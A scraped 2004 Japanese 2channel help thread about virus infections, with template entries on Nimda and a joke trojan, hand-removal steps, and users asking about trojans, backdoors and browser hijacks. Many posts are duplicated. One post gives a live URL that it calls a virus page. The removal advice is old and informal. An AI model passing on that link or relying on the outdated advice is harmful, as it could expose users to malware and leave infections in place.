http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
http://www.nai.com/japan/virusinfo/stinger.asp
●備考
感染するとバックドアが用意され、感染パソコンのキーボード入力履歴が作られます。そのため悪意の
あるウイルス作者?に侵入されたりパスワードを盗まれたりします。感染してしまった場合は駆除した
あとにパスワード類を全て変更してください。
12 :「W32/Nimda」とその亜種に関する情報:04/07/10 00:15 ID:???
このウイルスは、セキュリティホールを悪用したウイルスで、ホームページを見るだけでウイルスに
感染することがあります。亜種も出現しているので、出現後にウイルス監視ソフトの定義ファイルを
更新していない場合、ウイルススキャンで検出出来ません。最新の定義ファイルに更新しましょう。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●下記サイトにも情報が掲載されているので、参照して下さい。
W32/Nimda
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.trendmicro.co.jp/nimda/
駆除ツール
http://www.trendmicro.co.jp/nimda/tool.asp (リンク切れ)
●備考
W32/Nimdaは1年以上前から流行していますが、いまだにウイルス届け出のトップ10にランクインして
います。それだけ感染力が強いウイルスだということですので警戒を怠らないようにしましょう。
※ちなみに2002年10月はKlez/Bugbear/Nimda/Badtrans/Hybrisがトップ5です。
感染することがあります。亜種も出現しているので、出現後にウイルス監視ソフトの定義ファイルを
更新していない場合、ウイルススキャンで検出出来ません。最新の定義ファイルに更新しましょう。
●予防策
★ブラウザ(InternetExplorer)にパッチを適用する
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●下記サイトにも情報が掲載されているので、参照して下さい。
W32/Nimda
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.trendmicro.co.jp/nimda/
駆除ツール
http://www.trendmicro.co.jp/nimda/tool.asp (リンク切れ)
●備考
W32/Nimdaは1年以上前から流行していますが、いまだにウイルス届け出のトップ10にランクインして
います。それだけ感染力が強いウイルスだということですので警戒を怠らないようにしましょう。
※ちなみに2002年10月はKlez/Bugbear/Nimda/Badtrans/Hybrisがトップ5です。
13 :『MADOKA』・『OZAWA』について:04/07/10 00:15 ID:???
これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断されていましたが、
実際にはトロイ活動は無いジョークだということになっています。2ちゃんねる内で
直接リンクされることが多く、かなりの感染者が出ています。
<<感染ルート>>
madoka.zipなどをダウンロードし、解凍・実行することで感染します。
<<感染するとどうなるのか>>
・突然、女性の顔写真が画面いっぱいに表示されます。
・システム起動時にこのプログラムが実行されるようシステムを改変します。
<<詳細情報>>
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A
<<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
ozawa.exe、ozawa.logを検索し削除
(madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
いるところの ozawa.exe の部分を消去し上書き保存
(Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了
実際にはトロイ活動は無いジョークだということになっています。2ちゃんねる内で
直接リンクされることが多く、かなりの感染者が出ています。
<<感染ルート>>
madoka.zipなどをダウンロードし、解凍・実行することで感染します。
<<感染するとどうなるのか>>
・突然、女性の顔写真が画面いっぱいに表示されます。
・システム起動時にこのプログラムが実行されるようシステムを改変します。
<<詳細情報>>
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A
<<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
ozawa.exe、ozawa.logを検索し削除
(madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
いるところの ozawa.exe の部分を消去し上書き保存
(Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了
過去ログは情報の宝庫です
VOL 1 http://natto.2ch.net/pcqa/kako/987/987063100.html
VOL 2 http://natto.2ch.net/pcqa/kako/992/992241089.html
VOL 3 http://natto.2ch.net/pcqa/kako/997/997485641.html
VOL 4 http://natto.2ch.net/pcqa/kako/1000/10008/1000881294.html
VOL 5 http://natto.2ch.net/pcqa/kako/1001/10012/1001242103.html
VOL 6 http://pc.2ch.net/pcqa/kako/1005/10057/1005771153.html
VOL 7 http://pc.2ch.net/pcqa/kako/1006/10068/1006818033.html
VOL 8 http://pc.2ch.net/pcqa/kako/1007/10071/1007142533.html
VOL 9 http://pc.2ch.net/pcqa/kako/1007/10076/1007658885.html
VOL10 http://pc.2ch.net/pcqa/kako/1008/10088/1008862704.html
VOL11 http://pc.2ch.net/pcqa/kako/1010/10105/1010511938.html
VOL12 http://pc.2ch.net/pcqa/kako/1011/10119/1011948828.html
VOL13 http://pc.2ch.net/pcqa/kako/1012/10129/1012945529.html
VOL14 http://pc.2ch.net/pcqa/kako/1014/10144/1014418017.html
VOL15 http://pc.2ch.net/pcqa/kako/1015/10157/1015798305.html
VOL16 http://pc.2ch.net/pcqa/kako/1017/10177/1017727636.html
VOL17 http://pc.2ch.net/pcqa/kako/1019/10192/1019273687.html
VOL18 http://pc.2ch.net/pcqa/kako/1020/10205/1020583752.html
VOL19 http://pc.2ch.net/pcqa/kako/1021/10219/1021932401.html
VOL20 http://pc.2ch.net/pcqa/kako/1023/10235/1023569198.html
VOL 1 http://natto.2ch.net/pcqa/kako/987/987063100.html
VOL 2 http://natto.2ch.net/pcqa/kako/992/992241089.html
VOL 3 http://natto.2ch.net/pcqa/kako/997/997485641.html
VOL 4 http://natto.2ch.net/pcqa/kako/1000/10008/1000881294.html
VOL 5 http://natto.2ch.net/pcqa/kako/1001/10012/1001242103.html
VOL 6 http://pc.2ch.net/pcqa/kako/1005/10057/1005771153.html
VOL 7 http://pc.2ch.net/pcqa/kako/1006/10068/1006818033.html
VOL 8 http://pc.2ch.net/pcqa/kako/1007/10071/1007142533.html
VOL 9 http://pc.2ch.net/pcqa/kako/1007/10076/1007658885.html
VOL10 http://pc.2ch.net/pcqa/kako/1008/10088/1008862704.html
VOL11 http://pc.2ch.net/pcqa/kako/1010/10105/1010511938.html
VOL12 http://pc.2ch.net/pcqa/kako/1011/10119/1011948828.html
VOL13 http://pc.2ch.net/pcqa/kako/1012/10129/1012945529.html
VOL14 http://pc.2ch.net/pcqa/kako/1014/10144/1014418017.html
VOL15 http://pc.2ch.net/pcqa/kako/1015/10157/1015798305.html
VOL16 http://pc.2ch.net/pcqa/kako/1017/10177/1017727636.html
VOL17 http://pc.2ch.net/pcqa/kako/1019/10192/1019273687.html
VOL18 http://pc.2ch.net/pcqa/kako/1020/10205/1020583752.html
VOL19 http://pc.2ch.net/pcqa/kako/1021/10219/1021932401.html
VOL20 http://pc.2ch.net/pcqa/kako/1023/10235/1023569198.html
過去ログは情報の宝庫です
VOL21 http://pc.2ch.net/pcqa/kako/1025/10254/1025452031.html
VOL22 http://pc.2ch.net/pcqa/kako/1026/10269/1026931400.html
VOL23 http://pc.2ch.net/pcqa/kako/1029/10291/1029180331.html
VOL24 http://pc.2ch.net/pcqa/kako/1032/10321/1032120386.html
VOL25 http://pc.2ch.net/pcqa/kako/1035/10352/1035251402.html
VOL26 http://pc.2ch.net/pcqa/kako/1037/10370/1037042803.html
VOL27 http://pc5.2ch.net/pcqa/kako/1042/10420/1042090267.html
VOL28 http://pc5.2ch.net/pcqa/kako/1046/10462/1046237849.html
VOL29 http://pc5.2ch.net/pcqa/kako/1053/10537/1053751626.html
VOL30 http://pc5.2ch.net/pcqa/kako/1060/10607/1060770728.html
VOL31 http://pc5.2ch.net/pcqa/kako/1061/10615/1061572290.html
VOL32 http://pc5.2ch.net/pcqa/kako/1063/10633/1063324373.html
VOL33 http://pc2.2ch.net/test/read.cgi/pcqa/1067837089/
VOL34 http://pc5.2ch.net/test/read.cgi/pcqa/1076474510/
VOL35 http://pc5.2ch.net/test/read.cgi/pcqa/1081273348/
VOL36 http://pc5.2ch.net/test/read.cgi/pcqa/1083682988/
VOL37 http://pc6.2ch.net/test/read.cgi/pcqa/1085648175/
VOL21 http://pc.2ch.net/pcqa/kako/1025/10254/1025452031.html
VOL22 http://pc.2ch.net/pcqa/kako/1026/10269/1026931400.html
VOL23 http://pc.2ch.net/pcqa/kako/1029/10291/1029180331.html
VOL24 http://pc.2ch.net/pcqa/kako/1032/10321/1032120386.html
VOL25 http://pc.2ch.net/pcqa/kako/1035/10352/1035251402.html
VOL26 http://pc.2ch.net/pcqa/kako/1037/10370/1037042803.html
VOL27 http://pc5.2ch.net/pcqa/kako/1042/10420/1042090267.html
VOL28 http://pc5.2ch.net/pcqa/kako/1046/10462/1046237849.html
VOL29 http://pc5.2ch.net/pcqa/kako/1053/10537/1053751626.html
VOL30 http://pc5.2ch.net/pcqa/kako/1060/10607/1060770728.html
VOL31 http://pc5.2ch.net/pcqa/kako/1061/10615/1061572290.html
VOL32 http://pc5.2ch.net/pcqa/kako/1063/10633/1063324373.html
VOL33 http://pc2.2ch.net/test/read.cgi/pcqa/1067837089/
VOL34 http://pc5.2ch.net/test/read.cgi/pcqa/1076474510/
VOL35 http://pc5.2ch.net/test/read.cgi/pcqa/1081273348/
VOL36 http://pc5.2ch.net/test/read.cgi/pcqa/1083682988/
VOL37 http://pc6.2ch.net/test/read.cgi/pcqa/1085648175/
>>1
きれいなテンプレ乙
きれいなテンプレ乙
19 :ひよこ名無しさん:04/07/10 14:44 ID:b6IH48S/
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
に、アクセスしてウイルススキャンしようとしてもエラーページに飛ばされるんですが
どうしませうl。
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
に、アクセスしてウイルススキャンしようとしてもエラーページに飛ばされるんですが
どうしませうl。
>>19
すでに感染していてhostsが書き換えられているのでは?
アダルトサイト被害対策の部屋より「hostsファイルの削除 (緊急処置)」
ttp://higaitaisaku.web.infoseek.co.jp/hosts.html
ここの「ダミーのhostsファイルを入れる」という場所を読んで、
実行してみてください。アクセスできるようになるかも知れませんよ。
すでに感染していてhostsが書き換えられているのでは?
アダルトサイト被害対策の部屋より「hostsファイルの削除 (緊急処置)」
ttp://higaitaisaku.web.infoseek.co.jp/hosts.html
ここの「ダミーのhostsファイルを入れる」という場所を読んで、
実行してみてください。アクセスできるようになるかも知れませんよ。
ここに誘導されたのできました。
Antinnyって、完全スキャン(ノートン)して
win.iniのぬるぽを消せばいいんですよね?
Antinnyって、完全スキャン(ノートン)して
win.iniのぬるぽを消せばいいんですよね?
,、-―-、 俺のデスクトップ!?
丿 <`) __
,、- ''' "二ヽ_(ヽ'`(二ニ・ | \_
/ 、 !__'、_┌´ │ / `' ー┐
/ ヽ | ` | | |
___ | ヾ__| | _,、r‐'',ニ=- | / _,、-‐'゙
_| '、| ミ/ ゙、 |_,∠-''´ ̄`'ー、  ̄|-''" |
\|. | l___l / ̄ヾ`´` | ̄ ̄ ̄`'''iー、
. |/゙|  ̄ ヽ_,、-''´`ヽ _,、,、,、,、_|______|_
| ( ´ ,、- ''゙ 丿 ヾ二二二二二二二二二|ニ!
ヽ<二二二二二>~/ / / └‐┬─‐────┬┘
フ,||, / / / │ │
丿 <`) __
,、- ''' "二ヽ_(ヽ'`(二ニ・ | \_
/ 、 !__'、_┌´ │ / `' ー┐
/ ヽ | ` | | |
___ | ヾ__| | _,、r‐'',ニ=- | / _,、-‐'゙
_| '、| ミ/ ゙、 |_,∠-''´ ̄`'ー、  ̄|-''" |
\|. | l___l / ̄ヾ`´` | ̄ ̄ ̄`'''iー、
. |/゙|  ̄ ヽ_,、-''´`ヽ _,、,、,、,、_|______|_
| ( ´ ,、- ''゙ 丿 ヾ二二二二二二二二二|ニ!
ヽ<二二二二二>~/ / / └‐┬─‐────┬┘
フ,||, / / / │ │
2日前くらいから、製品のアップデートというポップアップが出てきます。
広告みたいなものじゃないです。
でも製品名が書いてないし、1時間に10回くらいは出るので怪しいと思い、
ウィルススキャンしたところBKDRというハッキングツールの一種が入ってました。
色々調べていたのですがいまいち駆除の仕方に辿りつけず、
もう一度スキャンしたらウィルスは感知されませんでした。
でも製品アップデートは出てくるし、急にサイトが見れなくなったりします。
最初は回線が悪いのかと思っていたのですが、2日間そんな状態が続いてるので。
一体これは何なのでしょうか?
スパイウェアなんですかね?
広告みたいなものじゃないです。
でも製品名が書いてないし、1時間に10回くらいは出るので怪しいと思い、
ウィルススキャンしたところBKDRというハッキングツールの一種が入ってました。
色々調べていたのですがいまいち駆除の仕方に辿りつけず、
もう一度スキャンしたらウィルスは感知されませんでした。
でも製品アップデートは出てくるし、急にサイトが見れなくなったりします。
最初は回線が悪いのかと思っていたのですが、2日間そんな状態が続いてるので。
一体これは何なのでしょうか?
スパイウェアなんですかね?
>>23
バックドア型スパイウェアだな
バックドア型スパイウェアだな
26 :ひよこ名無しさん:04/07/10 21:45 ID:S1fb8Y3X
ウイルス↓
http://hyper10.amuser-net.ne.jp/~auto/b3/usr/azumi/brd1/bbs.cgi
これにひっかかってしまって困ってます
インターネット開いたら毎回BLANKで2.3回でてきます
それに英文でSPYWAREがどーのというのも別窓ででてきます
上記の・シマンテック セキュリティチェック ではTROJとでて「ファイルから隔離できませんでした」となり
Panda無償オンラインスキャン で駆除しようと思い実行しましたが「ウイルス見つかりません」と出ました
こんな私になにかアドバイスをおねがいします。
http://hyper10.amuser-net.ne.jp/~auto/b3/usr/azumi/brd1/bbs.cgi
これにひっかかってしまって困ってます
インターネット開いたら毎回BLANKで2.3回でてきます
それに英文でSPYWAREがどーのというのも別窓ででてきます
上記の・シマンテック セキュリティチェック ではTROJとでて「ファイルから隔離できませんでした」となり
Panda無償オンラインスキャン で駆除しようと思い実行しましたが「ウイルス見つかりません」と出ました
こんな私になにかアドバイスをおねがいします。
27 :ひよこ名無しさん:04/07/10 22:11 ID:5zJ3QYlc
TROJ_RAHITOR.Aと言うウイルスに感染したんだけどコレってヤバイの?
どうやって駆除するの
どうやって駆除するの
>>27
マイクロトレンドとかのサイトに行って駆除の方法が載ってる
マイクロトレンドとかのサイトに行って駆除の方法が載ってる
TROJDECEIVLNK.Aというウイルスに感染したんですが、
バスターで駆除出来なくてファイルは削除しました。って表示が出ましたが
パソコンが相変わらず起動出来ません。
どうしたらいいのですか?
バスターで駆除出来なくてファイルは削除しました。って表示が出ましたが
パソコンが相変わらず起動出来ません。
どうしたらいいのですか?
>>29
セーフモードで起動、ウィルススキャンし、駆除する。
セーフモードで起動、ウィルススキャンし、駆除する。
32 :26:04/07/10 22:40 ID:S1fb8Y3X
TROJ_AGENT.ACていうウイルスでした。どなたか・・・
33 :ひよこ名無しさん:04/07/10 22:40 ID:5zJ3QYlc
マイクロトレンドに行って見たのですが
いまいち良く解りませんここしかないのでしょうか?初心者ですみません
いまいち良く解りませんここしかないのでしょうか?初心者ですみません
TROJDECEIVLNK.Aもマイクロトレンドで検索してもみつからなかったよ。
ウイルスバスターを使う。
>>29
リアルタイム検索してる?
リアルタイム検索してる?
↑どんな被害が出るの?踏むのが怖い
40 :ひよこ名無しさん:04/07/10 23:33 ID:1w39dWjA
Exploit-ByteVerifyというのに感染しました
駆除方法がみつかりません。教えてください。
駆除方法がみつかりません。教えてください。
>>40
窓の手使え。
窓の手使え。
42 :ひよこ名無しさん:04/07/10 23:44 ID:1w39dWjA
>>42
でもなんで自演なんてするの?
でもなんで自演なんてするの?
44 :ひよこ名無しさん:04/07/10 23:47 ID:1w39dWjA
>>43
??自演なんてしてません。。。
いま検索して窓の手というのをインストールしてみたんですけれど
どうすればいいのかわかりません><
ウィルスはマカフィーで削除できませんでした、とでます。
助けてください。
??自演なんてしてません。。。
いま検索して窓の手というのをインストールしてみたんですけれど
どうすればいいのかわかりません><
ウィルスはマカフィーで削除できませんでした、とでます。
助けてください。
>>44
いじくるつくーる使え
いじくるつくーる使え
47 :名無しさん@そうだ選挙に行こう:04/07/11 10:04 ID:P+gVMLRz
BKDR_AGENT.AY
に、感染しました。駆除方法を教えていただけませんか?
よろしくお願いします。
に、感染しました。駆除方法を教えていただけませんか?
よろしくお願いします。
48 :名無しさん@そうだ選挙に行こう:04/07/11 10:09 ID:???
初心者はお店でノートンを買う
え 間違ってないだろ
>47
え 間違ってないだろ
>47
49 :47:04/07/11 10:19 ID:P+gVMLRz
>>48
返信、どうもです。
ノートン、インストしてます。最近、ウィルス付きのメールが来るようになり気になって
スキャンやてみたのですが、ウィルスは検索されず・・・。
他社のオンラインスキャンを試したところ、「BKDR_AGENT.AY」が検知されました。
ノートンでは、まだ対応してない新種?みたいで、依然ウィルス付きメールを隔離するだけ
になってます。
お力を貸していただけないでしょうか?
返信、どうもです。
ノートン、インストしてます。最近、ウィルス付きのメールが来るようになり気になって
スキャンやてみたのですが、ウィルスは検索されず・・・。
他社のオンラインスキャンを試したところ、「BKDR_AGENT.AY」が検知されました。
ノートンでは、まだ対応してない新種?みたいで、依然ウィルス付きメールを隔離するだけ
になってます。
お力を貸していただけないでしょうか?
50 :名無しさん@そうだ選挙に行こう:04/07/11 10:26 ID:???
わるいが
プロが対応できんのに
わしら素人には手のおえんです 残念です
には
プロが対応できんのに
わしら素人には手のおえんです 残念です
には
51 :名無しさん@そうだ選挙に行こう:04/07/11 10:40 ID:???
>>49
Backdoorならファイルの場所が分かれば手動で削除できないかい。
BKDR_AGENT.AY情報(トレンド)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_AGENT.AY
BackDoor-BDJ(McAfee)
ttp://www.mcafeesecurity.com/japan/security/virB.asp?v=BackDoor-BDJ
トレンドが対応しているようだから、
まずオンラインスキャンしてファイルの場所を特定してみてはいかがだろうか。
ウイルスバスターオンラインスキャン
ttp://www.trendmicro.co.jp/hcall/
その時に感染が見つかったらファイル名と場所をメモしておいて、
セーフモードで削除。出来るかは、わからないけど・・・。
Backdoorならファイルの場所が分かれば手動で削除できないかい。
BKDR_AGENT.AY情報(トレンド)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_AGENT.AY
BackDoor-BDJ(McAfee)
ttp://www.mcafeesecurity.com/japan/security/virB.asp?v=BackDoor-BDJ
トレンドが対応しているようだから、
まずオンラインスキャンしてファイルの場所を特定してみてはいかがだろうか。
ウイルスバスターオンラインスキャン
ttp://www.trendmicro.co.jp/hcall/
その時に感染が見つかったらファイル名と場所をメモしておいて、
セーフモードで削除。出来るかは、わからないけど・・・。
52 :47:04/07/11 10:50 ID:P+gVMLRz
53 :名無しさん@そうだ選挙に行こう:04/07/11 12:24 ID:2yEkJisn
54 :名無しさん@そうだ選挙に行こう:04/07/11 12:25 ID:???
>>53
窓の手使え。
窓の手使え。
55 :名無しさん@そうだ選挙に行こう:04/07/11 12:26 ID:???
56 :53:04/07/11 12:29 ID:2yEkJisn
57 :名無しさん@そうだ選挙に行こう:04/07/11 12:31 ID:???
58 :53:04/07/11 12:38 ID:2yEkJisn
59 :名無しさん@そうだ選挙に行こう:04/07/11 12:55 ID:???
マルチで地雷とは・・・おめでて〜な
60 :名無しさん@そうだ選挙に行こう:04/07/11 14:20 ID:L9Y8Vx9H
こんにちは。
一昨日から知らない人達からメールが送られてきて、(1つは添付付)
ノートンアンチウイルスから警告でまくりなんですが、放置しといても
いいですよね? W32.netsky.@pmm に感染しているって警告なんですが。。
ご教授お願いいたします。
一昨日から知らない人達からメールが送られてきて、(1つは添付付)
ノートンアンチウイルスから警告でまくりなんですが、放置しといても
いいですよね? W32.netsky.@pmm に感染しているって警告なんですが。。
ご教授お願いいたします。
61 :名無しさん@そうだ選挙に行こう:04/07/11 14:21 ID:???
>>60
知らないメールは開かず削除でソッコー解決。
知らないメールは開かず削除でソッコー解決。
62 :名無しさん@そうだ選挙に行こう:04/07/11 14:36 ID:L9Y8Vx9H
>>61
ありがとうございました!
ありがとうございました!
63 :名無しさん@そうだ選挙に行こう:04/07/11 16:23 ID:???
最近 ポート135
よくスキャンか受信しそうになったりか
するんですよ
みなさんもそうですか?
よくスキャンか受信しそうになったりか
するんですよ
みなさんもそうですか?
64 :名無しさん@そうだ選挙に行こう:04/07/11 17:25 ID:???
↑
ファイル共有じゃなくて、RPCサービスで使うポートだ。
ファイル共有じゃなくて、RPCサービスで使うポートだ。
67 :ひよこ名無しさん:04/07/12 15:27 ID:fnS8zoX7
PCにはSymantec Antivirus Corporate Editionをインストールしているのですが
あるディレクトリをスキャンすると、物理ドライブ1のマスターブートセクターをスキャンし始めるんです。
そんで、スキャンしたファイルが0のままスキャンを完了してしまいますし、問題のファイルは
削除できません。ディレクトリが空ではありません。の表示が出て、おしまいです。
しかも、そのファイルをいじくっていると、常駐ソフトがいつの間にか終了していくんです。
もうだめです。
誰か教えてください。
あるディレクトリをスキャンすると、物理ドライブ1のマスターブートセクターをスキャンし始めるんです。
そんで、スキャンしたファイルが0のままスキャンを完了してしまいますし、問題のファイルは
削除できません。ディレクトリが空ではありません。の表示が出て、おしまいです。
しかも、そのファイルをいじくっていると、常駐ソフトがいつの間にか終了していくんです。
もうだめです。
誰か教えてください。
>>67
ウイルス入りの割れだから。
ウイルス入りの割れだから。
69 :67:04/07/12 15:37 ID:fnS8zoX7
>>68
すいません、意味がわかりません
すいません、意味がわかりません
>>69
Symantecに聞けばいい。
Symantecに聞けばいい。
個人でわざわざ Corporate Edition を買うヤシはいない。
73 :67:04/07/12 16:31 ID:fnS8zoX7
>>73
それを違法コピーと言う。
それを違法コピーと言う。
>>67
逮捕記念上げ
逮捕記念上げ
76 :ひよこ名無しさん:04/07/12 17:37 ID:SuP0HIde
ウィルスに感染しました。
トレンドマイクロのオンラインスキャンで
スキャンした所、bobax.Cというウィルスらしいです。
ノートンアンチウィルス2004を購入してきて
インストールしようと思うのですがシステムがシャットダウン
されてインストールできません。
bobaxの駆除方法はございますでしょうか?
トレンドマイクロのオンラインスキャンで
スキャンした所、bobax.Cというウィルスらしいです。
ノートンアンチウィルス2004を購入してきて
インストールしようと思うのですがシステムがシャットダウン
されてインストールできません。
bobaxの駆除方法はございますでしょうか?
77 :76:04/07/12 17:38 ID:SuP0HIde
すいませんOSはXPhomeです
>>67
とりあえず通報して様子見
とりあえず通報して様子見
Antinnyはどうやって駆除するのでしょうか?
81 :ぼるじょあ ◆yBEncckFOU :04/07/12 20:19 ID:???
>>80
m9(・3・) エェー 割れ廚発見しますた
m9(・3・) エェー 割れ廚発見しますた
82 :ひよこ名無しさん:04/07/12 21:51 ID:YEXjOho4
ファイルがどんどん消えていったのですが、新しいHD購入して復元というソフトを使ってファイルの復元を試みたところ、ファイルサイズがすべて33になっていて復元できませんでした。
これらのファイルを復元する方法はありますか?
これらのファイルを復元する方法はありますか?
83 :ぼるじょあ ◆yBEncckFOU :04/07/12 21:55 ID:???
84 :人科:04/07/12 22:01 ID:rWsN86yZ
ここはスパイウェアーあつかってますか!!?????
>>82
ねえよ、もうおわり。
ねえよ、もうおわり。
87 :ひよこ名無しさん:04/07/13 01:35 ID:xDgRN+4O
すいません、質問させてください。
一昨日スパイウェアに感染?してしまい、
何とか復元できたと思っていたら今日ウィルスに感染していました。
Windous XP使用で元から入っていた
Norton AntiVirusを使っているのですが
Trojan Horseに感染したようです。
「修復できません、最新の定義ウイルスをダウンンロードしてください。」
と出たためダウンロードしたのですが修復出来ません。
どうすれば良いのでしょうか?
テンプレを何度も読んだのですがよく分かりません。
無知で申し訳ないのですか、アドバイスお願いします。
ウィルスに感染したのはやはりスパイウェアが原因なのでしょうか?
一昨日スパイウェアに感染?してしまい、
何とか復元できたと思っていたら今日ウィルスに感染していました。
Windous XP使用で元から入っていた
Norton AntiVirusを使っているのですが
Trojan Horseに感染したようです。
「修復できません、最新の定義ウイルスをダウンンロードしてください。」
と出たためダウンロードしたのですが修復出来ません。
どうすれば良いのでしょうか?
テンプレを何度も読んだのですがよく分かりません。
無知で申し訳ないのですか、アドバイスお願いします。
ウィルスに感染したのはやはりスパイウェアが原因なのでしょうか?
88 :ひよこ名無しさん:04/07/13 01:55 ID:LZAloZsF
質問です
昨日からパソコンの調子がオカシイので
BIGLOBEのホームページでウィルススキャンとゆうのをやってみた所
『C:\Program Files\gikoNavi\Log\2ch\morningcoffee\1083344761.dat は
VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1079793541.dat は
VBS.Internal に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1088710560.dat は
VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\Owner\Local Settings\Temp\Temporary Internet Files\Content.IE5\RFDW50R0\sahra6138[1].jpg は
Js.Trojan.WindowBomb に感染しています。 』
と出て来たのですが
パソコンに関して素人なのでどうしていいのかよく解かりません・・・
どうしたらいいのでしょうか?
昨日からパソコンの調子がオカシイので
BIGLOBEのホームページでウィルススキャンとゆうのをやってみた所
『C:\Program Files\gikoNavi\Log\2ch\morningcoffee\1083344761.dat は
VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1079793541.dat は
VBS.Internal に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1088710560.dat は
VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\Owner\Local Settings\Temp\Temporary Internet Files\Content.IE5\RFDW50R0\sahra6138[1].jpg は
Js.Trojan.WindowBomb に感染しています。 』
と出て来たのですが
パソコンに関して素人なのでどうしていいのかよく解かりません・・・
どうしたらいいのでしょうか?
>>88
上の三つはノートンの誤反応なので無視しても良い。
最後のは
InternetExplorerの「ツール」メニュー「インターネットオプション」で
「インターネット一時ファイル」を削除すればいいはず。
上の三つはノートンの誤反応なので無視しても良い。
最後のは
InternetExplorerの「ツール」メニュー「インターネットオプション」で
「インターネット一時ファイル」を削除すればいいはず。
91 :88:04/07/13 02:15 ID:LZAloZsF
削除したのですが治る気配がありません・・・
Windous XPを使ってるんですが
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです
ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン
Windous XPを使ってるんですが
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです
ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン
>>91
あー、スパイウェアにやられてるね。エロサイトスレのテンプレをやれ。
あー、スパイウェアにやられてるね。エロサイトスレのテンプレをやれ。
>>91 >>88
このスレッドの 4-11 とそのリンク先を読んで自己努力
↓ 偽のリンクを貼るヤツがいるので、リンク先をよく確認。
↓
エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/4-11
about:blank / Search for の対策も載っています
このスレッドの 4-11 とそのリンク先を読んで自己努力
↓ 偽のリンクを貼るヤツがいるので、リンク先をよく確認。
↓
エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/4-11
about:blank / Search for の対策も載っています
プロ地雷師がいるようだなw
95 :88:04/07/13 02:41 ID:LZAloZsF
>>95
Search for は再起動したら再発することもあるので要注意
Search for は再起動したら再発することもあるので要注意
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://pc5.2ch.net/test/read.cgi/software/1088262283/1
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://pc5.2ch.net/test/read.cgi/software/1088262283/1
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●
98 :ひよこ名無しさん:04/07/14 09:06 ID:UWS7vQ2a
かなり深刻な状態になったので質問にまいりました。
win2000でインターネットエクスプローラー6を使ってます
昨日四窓くらいしてインターネットをしていたらフリーズしてしまい
PCの本体の電源ボタンを押しっぱなしにして電源を切りました。
それで今日PCつけてみたらマウスがおかしいのです。左クリックができないのです
で右でダブルクリックとかすると開いたり起動したりします。
ココまでくるのにTABキーをつかってやっときました。これはウイルスでしょうか?
本当にくるしいです助けてください。
win2000でインターネットエクスプローラー6を使ってます
昨日四窓くらいしてインターネットをしていたらフリーズしてしまい
PCの本体の電源ボタンを押しっぱなしにして電源を切りました。
それで今日PCつけてみたらマウスがおかしいのです。左クリックができないのです
で右でダブルクリックとかすると開いたり起動したりします。
ココまでくるのにTABキーをつかってやっときました。これはウイルスでしょうか?
本当にくるしいです助けてください。
マウス買い換えればOK。
